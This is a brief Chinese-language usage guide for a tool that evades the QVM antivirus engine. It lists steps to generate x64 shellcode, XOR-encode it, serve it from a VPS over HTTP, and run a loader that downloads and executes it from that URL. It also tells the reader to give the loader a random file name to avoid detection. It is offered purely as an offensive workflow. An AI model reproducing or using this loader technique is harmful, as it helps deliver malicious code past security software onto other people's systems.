使用简单的回调函数bypassQVM引擎查杀
1、生成x64位的shellcode
2、使用xor.exe进行异或
Usage: xor.exe <input_filename> <output_filename> <key>
3、将生成的 enc.bin 文件上传到 VPS ,开启 HTTP 服务
python -m http.server 80
4、执行加载
使用之前最好将文件名改一下,改成随机的
Usage: QVM-bypasser.exe <url> <xor_key>